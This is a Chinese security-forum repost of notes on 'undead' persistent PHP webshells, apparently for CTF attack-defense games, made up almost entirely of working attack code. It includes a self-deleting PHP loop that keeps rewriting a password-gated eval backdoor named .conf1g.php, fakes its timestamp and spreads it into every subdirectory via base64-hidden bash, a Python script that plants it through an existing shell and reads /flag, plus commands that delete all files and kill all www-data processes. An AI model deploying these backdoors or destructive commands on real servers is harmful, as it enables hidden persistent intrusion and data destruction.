设为首页收藏本站
开启辅助访问 切换到窄版

安全矩阵

 找回密码
 立即注册
搜索
安全矩阵»安全矩阵 安全矩阵实验室 技术转载 本地的一点点关于不死马的记录 shell+php
返回列表 发新帖
查看: 2401|回复: 0

本地的一点点关于不死马的记录 shell+php

[复制链接]
Delina

855

主题

862

帖子

2940

积分

金牌会员

Rank: 6Rank: 6

积分
2940
发表于 2021-6-17 17:12:11 | 显示全部楼层 |阅读模式
原文链接:本地的一点点关于不死马的记录 shell+php
  1. 输出当前目录下所有子目录

  3. 1.sh
  4. SAVEIFS="$IFS"
  5. IFS="
  6. "
  7. printhypen()
  8. (
  9.             tab=$(( $1 * 4 ))
  10.             if [ $tab -gt 0 ]
  11.             then
  12.             printf "%-.${tab}s  " "$hypen"
  13.             fi
  14. )
  15. traverdir()
  16. (
  17.     pushd "$1" > /dev/null 2>&1
  18.     tab="$2"
  19.     for file in `ls -1`
  20.     do
  21.         if test -d "$file"
  22.         then
  23.             printhypen $tab
  24.             echo "<dir> $file"
  25.             traverdir "$file" "$((tab + 1  ))"
  26.         else
  27.             printhypen $tab
  28.             echo "$file"
  29.         fi
  30.     done
  31.     popd > /dev/null 2>&1
  32. )
  33. read -p "请输入要遍历的目录:" dir
  34. traverdir "$dir" 0
  35. IFS="$SAVEIFS"


  38. 2.sh
  39. traverdir()(pushd "$1" > /dev/null 2>&1;for file in `ls -1`;do if test -d "$file";then echo "$PWD/$file";traverdir "$file" "$((tab + 1  ))";fi;done);traverdir



  43. 3.sh
  44. # cp 当前目录下的.conf1g.php 到当前目录下所有子目录
  45. traverdir()(pushd "$1" > /dev/null 2>&1;for file in `ls -1`;do if test -d "$file";then cp $PWD/.conf1g.php $PWD/$file;echo "$PWD/$file";traverdir "$file" "$((tab + 1  ))";fi;done);traverdir




  50. 4.sh
  51. traverdir()(
  52.     pushd "$1" > /dev/null 2>&1
  53.     for file in `ls -1`
  54.     do
  55.       if test -d "$file"
  56.       then
  57.         cp $PWD/.conf1g.php $PWD/$file
  58.         echo "$PWD/$file"
  59.         traverdir "$file" "$((tab + 1  ))"
  60.     fi
  61.     done
  62. )
  63. traverdir




  68. 1.php
  69. system("echo 'dHJhdmVyZGlyKCkocHVzaGQgIiQxIiA+IC9kZXYvbnVsbCAyPiYxO2ZvciBmaWxlIGluIGBscyAtMWA7ZG8gaWYgdGVzdCAtZCAiJGZpbGUiO3RoZW4gZWNobyAiJFBXRC8kZmlsZSI7dHJhdmVyZGlyICIkZmlsZSIgIiQoKHRhYiArIDEgICkpIjtmaTtkb25lKTt0cmF2ZXJkaXI=' | base64 -d > 1.sh");
  70. $asd = system("bash 1.sh");





  76. 2.php
  77. <?php
  78. $asdf = [];
  79. function find_all_sub_folder($path){
  80.         global $asdf;
  81.         $handle = opendir($path);
  82.         while(false != ($file = readdir($handle))){
  83.             $pathinfo = pathinfo($file);
  84.             if ($pathinfo['basename'] != '.' && $pathinfo['basename'] != '..'){
  85.                 if(is_dir("$path/$file")){
  86.                     array_push($asdf,"$path/$file");
  87.                     find_all_sub_folder("$path/$file");
  88.                 }
  89.             }
  90.         }
  91.     }
  92. find_all_sub_folder(__DIR__);
  93. print_r($asdf);
  94. ?>





  100. 3.php
  101. <?php
  102. error_reporting(0);
  103. $path = '/Users/asura/asura/ctf/docker/kalinew2/tmp';

  105. $asdf = [];
  106. function find_all_sub_folder($path){
  107.     global $asdf;
  108.     $handle = opendir($path);
  109.     while(false != ($file = readdir($handle))){
  110.         $pathinfo = pathinfo($file);
  111.         if ($pathinfo['basename'] != '.' && $pathinfo['basename'] != '..'){
  112.             if(is_dir("$path/$file")){
  113.                 array_push($asdf,"$path/$file");
  114.                 find_all_sub_folder("$path/$file");
  115.             }
  116.         }
  117.     }
  118. }
  119. find_all_sub_folder($path);
  120. // var_dump($asdf);
  121. for($i=0;$i<count($asdf);$i++){
  122.     echo $asdf[$i].'/'.PHP_EOL;
  123. }





  129. 4.php
  130. <?php
  131. ignore_user_abort(true);
  132. set_time_limit(0);
  133. unlink(__FILE__);
  134. $file = '.conf1g.php';
  135. $code = '<?php if(md5($_GET["pwd"])=="cf36a83be7c40376adad9d0abb36acc0"){@eval($_POST[a]);} ?>';
  136. while (1){
  137.     file_put_contents($file,$code);
  138.     system('touch -m -d "2021-12-01 09:10:12" .conf1g.php');
  139.     system("echo 'dHJhdmVyZGlyKCkocHVzaGQgIiQxIiA+IC9kZXYvbnVsbCAyPiYxO2ZvciBmaWxlIGluIGBscyAtMWA7ZG8gaWYgdGVzdCAtZCAiJGZpbGUiO3RoZW4gY3AgJFBXRC8uY29uZjFnLnBocCAkUFdELyRmaWxlO2VjaG8gIiRQV0QvJGZpbGUiO3RyYXZlcmRpciAiJGZpbGUiICIkKCh0YWIgKyAxICApKSI7Zmk7ZG9uZSk7dHJhdmVyZGly' | base64 -d > 1.sh");
  140.     $asd = system("bash 1.sh");
  141.     usleep(1000);
  142. }


  145. 1.py
  146. import base64
  147. a = '''<?php
  148. ignore_user_abort(true);
  149. set_time_limit(0);
  150. unlink(__FILE__);
  151. $file = '.conf1g.php';
  152. $code = '<?php if(md5($_GET["pwd"])=="cf36a83be7c40376adad9d0abb36acc0"){@eval($_POST[a]);} ?>';
  153. while (1){
  154.     file_put_contents($file,$code);
  155.     system('touch -m -d "2021-12-01 09:10:12" .conf1g.php');
  156.     system("echo 'dHJhdmVyZGlyKCkocHVzaGQgIiQxIiA+IC9kZXYvbnVsbCAyPiYxO2ZvciBmaWxlIGluIGBscyAtMWA7ZG8gaWYgdGVzdCAtZCAiJGZpbGUiO3RoZW4gY3AgJFBXRC8uY29uZjFnLnBocCAkUFdELyRmaWxlO2VjaG8gIiRQV0QvJGZpbGUiO3RyYXZlcmRpciAiJGZpbGUiICIkKCh0YWIgKyAxICApKSI7Zmk7ZG9uZSk7dHJhdmVyZGly' | base64 -d > 1.sh");
  157.     $asd = system("bash 1.sh");
  158.     usleep(1000);
  159. }'''
  160. print base64.b64encode(a)





  166. rm `find . -type f`
  167. 清空当前目录包括子目录所有文件

  169. find默认递归指定目录。目录可以有多个,目录之间要用空格分开


  172. 通过一句话getflag和写入不死马
  173. # coding:utf-8
  174. import requests
  175. import hackhttp
  176. import time
  177. hh = hackhttp.hackhttp()

  179. url = "http://127.0.0.1:10011/shell.php"

  181. # ?pwd=a3uRaEVSkFHeoqqp
  182. shell = '''system("echo 'PD9waHAKaWdub3JlX3VzZXJfYWJvcnQodHJ1ZSk7CnNldF90aW1lX2xpbWl0KDApOwp1bmxpbmsoX19GSUxFX18pOwokZmlsZSA9ICcuY29uZjFnLnBocCc7CiRjb2RlID0gJzw/cGhwIGlmKG1kNSgkX0dFVFsicHdkIl0pPT0iY2YzNmE4M2JlN2M0MDM3NmFkYWQ5ZDBhYmIzNmFjYzAiKXtAZXZhbCgkX1BPU1RbYV0pO30gPz4nOwp3aGlsZSAoMSl7CiAgICBmaWxlX3B1dF9jb250ZW50cygkZmlsZSwkY29kZSk7CiAgICBzeXN0ZW0oJ3RvdWNoIC1tIC1kICIyMDIxLTEyLTAxIDA5OjEwOjEyIiAuY29uZjFnLnBocCcpOwogICAgc3lzdGVtKCJlY2hvICdkSEpoZG1WeVpHbHlLQ2tvY0hWemFHUWdJaVF4SWlBK0lDOWtaWFl2Ym5Wc2JDQXlQaVl4TzJadmNpQm1hV3hsSUdsdUlHQnNjeUF0TVdBN1pHOGdhV1lnZEdWemRDQXRaQ0FpSkdacGJHVWlPM1JvWlc0Z1kzQWdKRkJYUkM4dVkyOXVaakZuTG5Cb2NDQWtVRmRFTHlSbWFXeGxPMlZqYUc4Z0lpUlFWMFF2SkdacGJHVWlPM1J5WVhabGNtUnBjaUFpSkdacGJHVWlJQ0lrS0NoMFlXSWdLeUF4SUNBcEtTSTdabWs3Wkc5dVpTazdkSEpoZG1WeVpHbHknIHwgYmFzZTY0IC1kID4gMS5zaCIpOwogICAgJGFzZCA9IHN5c3RlbSgiYmFzaCAxLnNoIik7CiAgICB1c2xlZXAoMTAwMCk7Cn0=' | base64 -d > asd.php");'''
  183. code1,head1,body1,redirect1,log1 = hh.http(url,post="a="+shell)
  184. # 写入木马0
  185. print code1 # 200

  187. url2 = "http://127.0.0.1:10011/asd.php"
  188. try:
  189.         res = requests.get(url2,timeout=1) # 简单请求一下激活不死马
  190. except:
  191.         pass
  192.         print "ok"
  193. # 请求木马0,在所有子目录批量生成不死马1

  195. # 用不死马GetFlag
  196. url3 = "http://127.0.0.1:10011/.conf1g.php?pwd=a3uRaEVSkFHeoqqp"
  197. res3 = requests.post(url3,data={"a":"system('cat /flag');"})
  198. print res3.text


  201. ps aux | grep www-data | awk '{print $2}' | xargs kill -9
  202. 筛选出www-data进程
  203. 筛选出pid
  204. kill掉


  207. ps aux | grep www-data | awk '{print $1,$2,$3,$4,$5,$6,$7,$8,$9,$10,$11,$12,$13,$14,$15,$16,$17,$18,$19,$20,$21,$22,$23,$24,$25,$26,$27}'
复制代码







回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-29 10:54 , Processed in 0.012499 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表